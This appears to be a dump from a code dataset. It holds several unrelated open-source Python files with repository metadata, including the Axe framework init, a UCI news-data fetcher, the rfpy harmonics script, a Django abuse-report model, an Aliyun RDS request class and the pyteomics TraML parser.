regex = regex.replace(r'\$', r'\\\$')
# Whereas single quotes should not be escaped
regex = regex.replace(r"\'", "'")
return regex
def _expand_path(path):
return '"$(echo %s)"' % path
| 37.898795
| 87
| 0.638543
|
794e526cf6386534186390c02df7eff01e38325d
| 374
|
py
|
Python
|
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Axe
~~~
A microframework based on Werkzeug.
:copyright: (c) 2014 by Ju Lin.
:license: MIT, see LICENSE for more details.
"""
__all__ = [
'abort',
'redirect',
'exceptions',
'Axe',
]
import werkzeug.exceptions as exceptions
from werkzeug.utils import redirect
from .app import Axe
from .utils import abort
| 14.96
| 48
| 0.625668
|
794e5424d1555685ab1a85aebfd73d84152e9a15
| 2,291
|
py
|
Python
|
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | 3
|
2021-06-22T10:17:56.000Z
|
2022-02-21T07:11:57.000Z
|
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | null | null | null |
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import random
import os
import requests
import zipfile
import io
def seed_everything(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
def fetch_data(url: str, save_dir: str, filename: str) -> pd.DataFrame:
req = requests.get(url)
zip_file = zipfile.ZipFile(io.BytesIO(req.content))
zip_file.extractall(save_dir)
df = pd.read_csv(os.path.join(save_dir, filename), sep='\t', header=None)
return df
def shape_data(df: pd.DataFrame):#-> (pd.DataFrame, pd.DataFrame, pd.DataFrame):
df.columns = ['id', 'title', 'url', 'publisher', 'category', 'story', 'hostname', 'timestamp']
df_cond = df[df['publisher'].isin(['Reuters' ,'Huffington Post',
'Businessweek', 'Contactmusic.com', 'Daily Mail'])]
df_train, df_val_test = train_test_split(df_cond, test_size=0.2)
df_val, df_test = train_test_split(df_val_test, test_size=0.5)
return df_train, df_val, df_test
def fetch_shape_data(url: str, save_dir: str, filename: str):# -> (pd.DataFrame, pd.DataFrame, pd.DataFrame):
df = fetch_data(url=url, save_dir=save_dir, filename=filename)
train_df, valid_df, test_df = shape_data(df=df)
return train_df, valid_df, test_df
if __name__ == '__main__':
seed_everything(seed=42)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00359/NewsAggregatorDataset.zip'
save_dir = './data/'
filename = 'newsCorpora.csv'
df_train, df_val, df_test = fetch_shape_data(url=url,
save_dir=save_dir,
filename=filename)
df_train.to_csv(os.path.join(save_dir, 'train.txt'), sep='\t',
index=None)
df_val.to_csv(os.path.join(save_dir, 'val.txt'), sep='\t',
index=None)
df_test.to_csv(os.path.join(save_dir, 'test.txt'), sep='\t',
index=None)
print('df_train record size:', len(df_train))
print('df_val record size:', len(df_val))
print('df_test record size:', len(df_test))
'''
df_train record size: 10672
df_val record size: 1334
df_test record size: 1334
'''
| 40.192982
| 109
| 0.64557
|
794e54795c37bb4144ce782213781ce1e2a3330b
| 479
|
py
|
Python
|
home/migrations/0011_auto_20190604_1215.py
|
xni06/wagtail-CMS
|
defe0f46e8109e96d6d5e9fd4cf002790fbcd54b
|
[
"MIT"
] | 4
|
2019-06-04T07:18:44.000Z
|
2020-06-15T22:27:36.000Z
|
home/migrations/0011_auto_20190604_1215.py
|
jaspotsangbam/wagtail-CMS
|
2ec0dd05ba1f9339b705ce529588131049aa9bc7
|
[
"MIT"
] | 38
|
2019-05-09T13:14:56.000Z
|
2022-03-12T00:54:57.000Z
|
home/migrations/0011_auto_20190604_1215.py
|
jaspotsangbam/wagtail-CMS
|
2ec0dd05ba1f9339b705ce529588131049aa9bc7
|
[
"MIT"
] | 3
|
2019-09-26T14:32:36.000Z
|
2021-05-06T15:48:01.000Z
|
# Generated by Django 2.1.8 on 2019-06-04 12:15
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('home', '0010_auto_20190604_1147'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='links',
field=wagtail.core.fields.StreamField([('link', wagtail.core.blocks.RichTextBlock())]),
),
]
| 22.809524
| 99
| 0.634656
|
794e5586e708657cbac48ada1eb6474769c452af
| 18,403
|
py
|
Python
|
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2019 Pascal Audet
#
# This file is part of RfPy.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Import modules and functions
import numpy as np
import pickle
import stdb
from obspy.clients.fdsn import Client
from obspy.core import Stream, UTCDateTime
from rfpy import binning, plotting, Harmonics
from pathlib import Path
from argparse import ArgumentParser
from os.path import exists as exist
from numpy import nan
def get_harmonics_arguments(argv=None):
"""
Get Options from :class:`~optparse.OptionParser` objects.
This function is used for data processing on-the-fly (requires web connection)
"""
parser = ArgumentParser(
usage="%(prog)s [arguments] <station database>",
description="Script used to process receiver function data " +
"for harmonic decomposition.")
# General Settings
parser.add_argument(
"indb",
help="Station Database to process from.",
type=str)
parser.add_argument(
"--keys",
action="store",
type=str,
dest="stkeys",
default="",
help="Specify a comma separated list of station keys for " +
"which to perform the analysis. These must be " +
"contained within the station database. Partial keys will " +
"be used to match against those in the dictionary. For " +
"instance, providing IU will match with all stations in " +
"the IU network [Default processes all stations in the database]")
parser.add_argument(
"-v", "-V", "--verbose",
action="store_true",
dest="verb",
default=False,
help="Specify to increase verbosity.")
parser.add_argument(
"-O", "--overwrite",
action="store_true",
dest="ovr",
default=False,
help="Force the overwriting of pre-existing data. " +
"[Default False]")
parser.add_argument(
"-L", "--long-name",
action="store_true",
dest="lkey",
default=False,
help="Force folder names to use long-key form (NET.STN.CHN). " +
"Default behaviour uses short key form (NET.STN) for the folder " +
"names, regardless of the key type of the database."
)
# Event Selection Criteria
TimeGroup = parser.add_argument_group(
title="Time Settings",
description="Settings associated with refining " +
"the times to include in searching for receiver function data")
TimeGroup.add_argument(
"--start",
action="store",
type=str,
dest="startT",
default="",
help="Specify a UTCDateTime compatible string representing " +
"the start time for the search. This will override any " +
"station start times. [Default start date of station]")
TimeGroup.add_argument(
"--end",
action="store",
type=str,
dest="endT",
default="",
help="Specify a UTCDateTime compatible string representing " +
"the end time for the search. This will override any " +
"station end times [Default end date of station]")
PreGroup = parser.add_argument_group(
title='Pre-processing Settings',
description="Options for pre-processing of receiver function " +
"data prior to harmonic decomposition")
PreGroup.add_argument(
"--bp",
action="store",
type=str,
dest="bp",
default=None,
help="Specify the corner frequencies for the bandpass filter. " +
"[Default 0.05,0.5]")
PreGroup.add_argument(
"--bin",
action="store",
dest="nbin",
type=int,
default=None,
help="Specify integer number of back-azimuth bins to consider " +
"(typically 36 or 72). [Default does not bin data]")
PreGroup.add_argument(
"--snr",
action="store",
type=float,
dest="snr",
default=-9999.,
help="Specify the SNR threshold for extracting receiver functions. " +
"[Default None]")
PreGroup.add_argument(
"--snrh",
action="store",
type=float,
dest="snrh",
default=-9999,
help="Specify the horizontal component SNR threshold for " +
"extracting receiver functions. [Default None]")
PreGroup.add_argument(
"--cc",
action="store",
type=float,
dest="cc",
default=-1.,
help="Specify the CC threshold for extracting receiver functions. " +
"[Default None]")
PreGroup.add_argument(
"--no-outlier",
action="store_true",
dest="no_outl",
default=False,
help="Set this option to delete outliers based on the MAD " +
"on the variance. [Default False]")
PreGroup.add_argument(
"--phase",
action="store",
type=str,
dest="phase",
default='allP',
help="Specify the phase name to plot. " +
"Options are 'P', 'PP', 'allP', 'S', 'SKS' or 'allS'. " +
"[Default 'allP']")
HarmonicGroup = parser.add_argument_group(
title='Settings for harmonic decomposition',
description="Specify parameters for the decomposition, e.g. " +
"a fixed azimuth, depth range for finding the optimal azimuth, etc.")
HarmonicGroup.add_argument(
"--azim",
action="store",
type=float,
dest="azim",
default=None,
help="Specify the azimuth angle along with to perform the " +
"decomposition. [Default 0.]")
HarmonicGroup.add_argument(
"--find-azim",
action="store_true",
dest="find_azim",
default=False,
help="Set this option to calculate the optimal azimuth. [Default " +
"uses the '--azim' value]")
HarmonicGroup.add_argument(
"--trange",
action="store",
type=str,
dest="trange",
default=None,
help="Specify a list of two floats with minimum and maximum" +
"bounds on time range for finding the optimal azimuth (sec). " +
"[Default [0., 10.] when '--find-azim' is set]")
HarmonicGroup.add_argument(
"--save",
action="store_true",
dest="save",
default=False,
help="Set this option to save the Harmonics object " +
"to a pickled file. [Default does not save object]")
PlotGroup = parser.add_argument_group(
title='Settings for plotting results',
description="Specify parameters for plotting the back-azimuth " +
"harmonics.")
PlotGroup.add_argument(
"--plot",
action="store_true",
dest="plot",
default=False,
help="Set this option to produce a plot of the back-azimuth harmonics")
PlotGroup.add_argument(
"--ymax",
action="store",
type=float,
dest="ymax",
default=30.,
help="Specify the maximum y axis value for the plot in units of the" +
"dependent variable (e.g., sec). [Default 30.]")
PlotGroup.add_argument(
"--scale",
action="store",
type=float,
dest="scale",
default=30.,
help="Specify the scaling value that multiplies the amplitude " +
"of the harmonic components. [Default 10.]")
PlotGroup.add_argument(
"--save-plot",
action="store_true",
dest="save_plot",
default=False,
help="Set this option to save the plot [Default doesn't save]")
PlotGroup.add_argument(
"--title",
action="store",
type=str,
dest="title",
default="",
help="Specify plot title [Default has no title]")
PlotGroup.add_argument(
"--format",
action="store",
type=str,
dest="form",
default="png",
help="Specify format of figure. Can be any one of the valid" +
"matplotlib formats: 'png', 'jpg', 'eps', 'pdf'. [Default 'png']")
args = parser.parse_args(argv)
# Check inputs
if not exist(args.indb):
parser.error("Input file " + args.indb + " does not exist")
# create station key list
if len(args.stkeys) > 0:
args.stkeys = args.stkeys.split(',')
# construct start time
if len(args.startT) > 0:
try:
args.startT = UTCDateTime(args.startT)
except:
parser.error(
"Cannot construct UTCDateTime from start time: " +
args.startT)
else:
args.startT = None
# construct end time
if len(args.endT) > 0:
try:
args.endT = UTCDateTime(args.endT)
except:
parser.error(
"Cannot construct UTCDateTime from end time: " +
args.endT)
else:
args.endT = None
if args.phase not in ['P', 'PP', 'allP', 'S', 'SKS', 'allS']:
parser.error(
"Error: choose between 'P', 'PP', 'allP', 'S', 'SKS' and 'allS'.")
if args.phase == 'allP':
args.listphase = ['P', 'PP']
elif args.phase == 'allS':
args.listphase = ['S', 'SKS']
else:
args.listphase = [args.phase]
if args.bp is None:
args.bp = [0.05, 0.5]
else:
args.bp = [float(val) for val in args.bp.split(',')]
args.bp = sorted(args.bp)
if (len(args.bp)) != 2:
parser.error(
"Error: --bp should contain 2 " +
"comma-separated floats")
if args.azim is not None and args.find_azim:
print("Warning: Setting both '--azim' and '--find-azim' is " +
"conflictual. Ignoring '--find-azim'")
args.find_azim = False
elif args.azim is None and not args.find_azim:
args.azim = 0.
if args.find_azim:
if args.trange is None:
args.trange = [0., 10.]
else:
args.trange = [float(val) for val in args.trange.split(',')]
args.trange = sorted(args.trange)
if (len(args.trange)) != 2:
parser.error(
"Error: --trange should contain 2 " +
"comma-separated floats")
return args
def main():
print()
print("################################################################################")
print("# __ _ _ #")
print("# _ __ / _|_ __ _ _ | |__ __ _ _ __ _ __ ___ ___ _ __ (_) ___ ___ #")
print("# | '__| |_| '_ \| | | | | '_ \ / _` | '__| '_ ` _ \ / _ \| '_ \| |/ __/ __| #")
print(
"# | | | _| |_) | |_| | | | | | (_| | | | | | | | | (_) | | | | | (__\__ \ #")
print("# |_| |_| | .__/ \__, |___|_| |_|\__,_|_| |_| |_| |_|\___/|_| |_|_|\___|___/ #")
print("# |_| |___/_____| #")
print("# #")
print("################################################################################")
print()
# Run Input Parser
args = get_harmonics_arguments()
# Load Database
db, stkeys = stdb.io.load_db(fname=args.indb, keys=args.stkeys)
# Track processed folders
procfold = []
# Loop over station keys
for stkey in list(stkeys):
# Extract station information from dictionary
sta = db[stkey]
# Construct Folder Name
stfld = stkey
if not args.lkey:
stfld = stkey.split('.')[0]+"."+stkey.split('.')[1]
# Define path to see if it exists
if args.phase in ['P', 'PP', 'allP']:
datapath = Path('P_DATA') / stfld
elif args.phase in ['S', 'SKS', 'allS']:
datapath = Path('S_DATA') / stfld
if not datapath.is_dir():
print('Path to ' + str(datapath) +
' doesn`t exist - continuing')
continue
# Get search start time
if args.startT is None:
tstart = sta.startdate
else:
tstart = args.startT
# Get search end time
if args.endT is None:
tend = sta.enddate
else:
tend = args.endT
if tstart > sta.enddate or tend < sta.startdate:
continue
# Temporary print locations
tlocs = sta.location
if len(tlocs) == 0:
tlocs = ['']
for il in range(0, len(tlocs)):
if len(tlocs[il]) == 0:
tlocs[il] = "--"
sta.location = tlocs
# Update Display
print(" ")
print(" ")
print("|===============================================|")
print("|===============================================|")
print("| {0:>8s} |".format(
sta.station))
print("|===============================================|")
print("|===============================================|")
print("| Station: {0:>2s}.{1:5s} |".format(
sta.network, sta.station))
print("| Channel: {0:2s}; Locations: {1:15s} |".format(
sta.channel, ",".join(tlocs)))
print("| Lon: {0:7.2f}; Lat: {1:6.2f} |".format(
sta.longitude, sta.latitude))
print("| Start time: {0:19s} |".format(
sta.startdate.strftime("%Y-%m-%d %H:%M:%S")))
print("| End time: {0:19s} |".format(
sta.enddate.strftime("%Y-%m-%d %H:%M:%S")))
print("|-----------------------------------------------|")
# Check for folder already processed
if stfld in procfold:
print(' {0} already processed...skipping '.format(stfld))
continue
rfRstream = Stream()
rfTstream = Stream()
datafiles = [x for x in datapath.iterdir() if x.is_dir()]
for folder in datafiles:
# Skip hidden folders
if folder.name.startswith('.'):
continue
date = folder.name.split('_')[0]
year = date[0:4]
month = date[4:6]
day = date[6:8]
dateUTC = UTCDateTime(year+'-'+month+'-'+day)
if dateUTC > tstart and dateUTC < tend:
filename = folder / "RF_Data.pkl"
if filename.is_file():
file = open(filename, "rb")
rfdata = pickle.load(file)
if rfdata[0].stats.snrh > args.snrh and \
rfdata[0].stats.snr and \
rfdata[0].stats.cc > args.cc:
rfRstream.append(rfdata[1])
rfTstream.append(rfdata[2])
file.close()
else:
continue
if args.no_outl:
# Remove outliers wrt variance
varR = np.array([np.var(tr.data) for tr in rfRstream])
# Calculate outliers
medvarR = np.median(varR)
madvarR = 1.4826*np.median(np.abs(varR-medvarR))
robustR = np.abs((varR-medvarR)/madvarR)
outliersR = np.arange(len(rfRstream))[robustR > 2.]
for i in outliersR[::-1]:
rfRstream.remove(rfRstream[i])
rfTstream.remove(rfTstream[i])
# Do the same for transverse
varT = np.array([np.var(tr.data) for tr in rfTstream])
medvarT = np.median(varT)
madvarT = 1.4826*np.median(np.abs(varT-medvarT))
robustT = np.abs((varT-medvarT)/madvarT)
outliersT = np.arange(len(rfTstream))[robustT > 2.]
for i in outliersT[::-1]:
rfRstream.remove(rfRstream[i])
rfTstream.remove(rfTstream[i])
# Try binning if specified
if args.nbin is not None:
rf_tmp = binning.bin(rfRstream, rfTstream,
typ='baz', nbin=args.nbin+1)
rfRstream = rf_tmp[0]
rfTstream = rf_tmp[1]
# Filter original streams
rfRstream.filter('bandpass', freqmin=args.bp[0],
freqmax=args.bp[1], corners=2,
zerophase=True)
rfTstream.filter('bandpass', freqmin=args.bp[0],
freqmax=args.bp[1], corners=2,
zerophase=True)
# Initialize the HkStack object
harmonics = Harmonics(rfRstream, rfTstream)
# Stack with or without dip
if args.find_azim:
harmonics.dcomp_find_azim(xmin=args.trange[0], xmax=args.trange[1])
print("Optimal azimuth for trange between " +
str(args.trange[0])+" and "+str(args.trange[1]) +
" seconds is: "+str(harmonics.azim))
else:
harmonics.dcomp_fix_azim(azim=args.azim)
if args.plot:
harmonics.plot(args.ymax, args.scale,
args.save_plot, args.title, args.form)
if args.save:
filename = datapath / (hkstack.hstream[0].stats.station +
".harmonics.pkl")
harmonics.save()
# Update processed folders
procfold.append(stfld)
if __name__ == "__main__":
# Run main program
main()
| 34.78828
| 93
| 0.532087
|
794e55de4deb3edb68474389856a9397451eca32
| 546
|
py
|
Python
|
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | null | null | null |
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class ShowtickprefixValidator(
_plotly_utils.basevalidators.EnumeratedValidator
):
def __init__(
self,
plotly_name='showtickprefix',
parent_name='scatterpolar.marker.colorbar',
**kwargs
):
super(ShowtickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
)
| 24.818182
| 54
| 0.602564
|
794e5626a66cf60721284635c4b42aad8e7c657b
| 3,391
|
py
|
Python
|
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from django.conf import settings
from django.db import models
from django.utils.translation import gettext
import amo.models
import amo.utils
from mkt.webapps.models import Addon
from mkt.users.models import UserProfile
log = logging.getLogger('z.abuse')
class AbuseReport(amo.models.ModelBase):
# NULL if the reporter is anonymous.
reporter = models.ForeignKey(UserProfile, null=True,
blank=True, related_name='abuse_reported')
ip_address = models.CharField(max_length=255, default='0.0.0.0')
# An abuse report can be for an addon or a user. Only one of these should
# be null.
addon = models.ForeignKey(Addon, null=True, related_name='abuse_reports')
user = models.ForeignKey(UserProfile, null=True,
related_name='abuse_reports')
message = models.TextField()
class Meta:
db_table = 'abuse_reports'
def send(self):
obj = self.addon or self.user
if self.reporter:
user_name = '%s (%s)' % (self.reporter.name, self.reporter.email)
else:
user_name = 'An anonymous coward'
with amo.utils.no_translation():
type_ = (gettext(amo.ADDON_TYPE[self.addon.type])
if self.addon else 'User')
subject = u'[%s] Abuse Report for %s' % (type_, obj.name)
msg = u'%s reported abuse for %s (%s%s).\n\n%s' % (
user_name, obj.name, settings.SITE_URL, obj.get_url_path(),
self.message)
amo.utils.send_mail(subject, msg,
recipient_list=(settings.ABUSE_EMAIL,))
@classmethod
def recent_high_abuse_reports(cls, threshold, period, addon_id=None,
addon_type=None):
"""
Returns AbuseReport objects for the given threshold over the given time
period (in days). Filters by addon_id or addon_type if provided.
E.g. Greater than 5 abuse reports for all webapps in the past 7 days.
"""
abuse_sql = ['''
SELECT `abuse_reports`.*,
COUNT(`abuse_reports`.`addon_id`) AS `num_reports`
FROM `abuse_reports`
INNER JOIN `addons` ON (`abuse_reports`.`addon_id` = `addons`.`id`)
WHERE `abuse_reports`.`created` >= %s ''']
params = [period]
if addon_id:
abuse_sql.append('AND `addons`.`id` = %s ')
params.append(addon_id)
elif addon_type and addon_type in amo.ADDON_TYPES:
abuse_sql.append('AND `addons`.`addontype_id` = %s ')
params.append(addon_type)
abuse_sql.append('GROUP BY addon_id HAVING num_reports > %s')
params.append(threshold)
return list(cls.objects.raw(''.join(abuse_sql), params))
def send_abuse_report(request, obj, message):
report = AbuseReport(ip_address=request.META.get('REMOTE_ADDR'),
message=message)
if request.user.is_authenticated():
report.reporter = request.user
if isinstance(obj, Addon):
report.addon = obj
elif isinstance(obj, UserProfile):
report.user = obj
report.save()
report.send()
# Trigger addon high abuse report detection task.
if isinstance(obj, Addon):
from amo.tasks import find_abuse_escalations
find_abuse_escalations.delay(obj.id)
| 36.074468
| 79
| 0.620466
|
794e562de3bc5dd0df1d69d4371d7ab13aa69398
| 2,140
|
py
|
Python
|
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeDampPoliciesByCidRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Rds', '2014-08-15', 'DescribeDampPoliciesByCid','rds')
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
def get_DBInstanceId(self):
return self.get_query_params().get('DBInstanceId')
def set_DBInstanceId(self,DBInstanceId):
self.add_query_param('DBInstanceId',DBInstanceId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
| 35.666667
| 84
| 0.77757
|
794e57af1f8bc8bdd40e8594eee12551f7bd4607
| 8,846
|
py
|
Python
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 47
|
2020-02-29T21:47:01.000Z
|
2022-03-17T13:27:30.000Z
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 53
|
2020-04-07T01:40:31.000Z
|
2022-03-17T12:15:44.000Z
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 23
|
2020-02-29T21:47:13.000Z
|
2021-11-26T04:32:07.000Z
|
"""
traml - targeted MS transition data in TraML format
===================================================
Summary
-------
TraML is a standard rich XML-format for targeted mass spectrometry method definitions.
Please refer to `psidev.info <http://www.psidev.info/traml>`_
for the detailed specification of the format and structure of TraML files.
This module provides a minimalistic way to extract information from TraML
files. You can use the object-oriented interface (:class:`TraML` instances) to
access target definitions and transitions. :class:`TraML` objects also support
indexing with entity IDs directly.
Data access
-----------
:py:class:`TraML` - a class representing a single TraML file.
Other data access functions use this class internally.
:py:func:`read` - iterate through transitions in TraML format.
:py:func:`chain` - read multiple TraML files at once.
:py:func:`chain.from_iterable` - read multiple files at once, using an
iterable of files.
Controlled Vocabularies
~~~~~~~~~~~~~~~~~~~~~~~
TraML relies on controlled vocabularies to describe its contents extensibly. See
`Controlled Vocabulary Terms <../data.html#controlled-vocabulary-terms-in-structured-data>`_
for more details on how they are used.
Handling Time Units and Other Qualified Quantities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TraML contains information which may be described as using a variety of different time units.
See `Unit Handling <../data.html#unit-handling>`_ for more information.
Deprecated functions
--------------------
:py:func:`version_info` - get version information about the TraML file.
You can just read the corresponding attribute of the :py:class:`TraML` object.
:py:func:`iterfind` - iterate over elements in an TraML file.
You can just call the corresponding method of the :py:class:`TraML` object.
Dependencies
------------
This module requires :py:mod:`lxml`
-------------------------------------------------------------------------------
"""
# Copyright 2018 Joshua Klein, Lev Levitsky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from . import xml, _schema_defaults, auxiliary as aux
class TraML(xml.MultiProcessingXML, xml.IndexSavingXML):
"""Parser class for TraML files."""
file_format = 'TraML'
_root_element = 'TraML'
_default_schema = _schema_defaults._traml_schema_defaults
_default_version = '1.0.0'
_default_iter_tag = 'Transition'
_indexed_tags = {
'Transition',
'Peptide',
'Compound',
'Target',
'Protein',
'Compound',
}
_element_handlers = xml.XML._element_handlers.copy()
_element_handlers.update({
'Modification': xml.XML._promote_empty_parameter_to_name,
'Interpretation': xml.XML._promote_empty_parameter_to_name,
'Software': xml.XML._promote_empty_parameter_to_name,
})
def __init__(self, *args, **kwargs):
kwargs.setdefault('retrieve_refs', True)
super(TraML, self).__init__(*args, **kwargs)
def _get_info_smart(self, element, **kw):
kwargs = dict(kw)
rec = kwargs.pop('recursive', None)
info = self._get_info(
element,
recursive=(rec if rec is not None else True),
**kwargs)
return info
def _retrieve_refs(self, info, **kwargs):
"""Retrieves and embeds the data for each attribute in `info` that
ends in `Ref`. Removes the id attribute from `info`"""
for k, v in dict(info).items():
if k[-3:] in {'Ref', 'ref'}:
if isinstance(v, str):
key = v
elif isinstance(v, dict):
key = v['ref']
else:
if k != 'ref':
info[k[:-3]] = info.pop(k)
continue
try:
by_id = self.get_by_id(key, retrieve_refs=True)
except KeyError:
warnings.warn('Ignoring unresolved reference: ' + key)
else:
if k == 'ref':
info.update(by_id)
else:
# by_id.pop('id', None)
info[k[:-3]] = by_id
del info[k]
def read(source, retrieve_refs=True, read_schema=False, iterative=True, use_index=False, huge_tree=False):
"""Parse `source` and iterate through transitions.
Parameters
----------
source : str or file
A path to a target TraML file or the file object itself.
retrieve_refs : bool, optional
If :py:const:`True`, additional information from references will be
automatically added to the results. The file processing time will
increase. Default is :py:const:`True`.
read_schema : bool, optional
If :py:const:`True`, attempt to extract information from the XML schema
mentioned in the TraML header. Otherwise, use default parameters.
Not recommended without Internet connection or
if you don't like to get the related warnings.
iterative : bool, optional
Defines whether iterative parsing should be used. It helps reduce
memory usage at almost the same parsing speed. Default is
:py:const:`True`.
use_index : bool, optional
Defines whether an index of byte offsets needs to be created for
spectrum elements. Default is :py:const:`False`.
huge_tree : bool, optional
This option is passed to the `lxml` parser and defines whether
security checks for XML tree depth and node size should be disabled.
Default is :py:const:`False`.
Enable this option for trusted files to avoid XMLSyntaxError exceptions
(e.g. `XMLSyntaxError: xmlSAX2Characters: huge text node`).
Returns
-------
out : TraML
A :py:class:`TraML` object, suitable for iteration and possibly random access.
"""
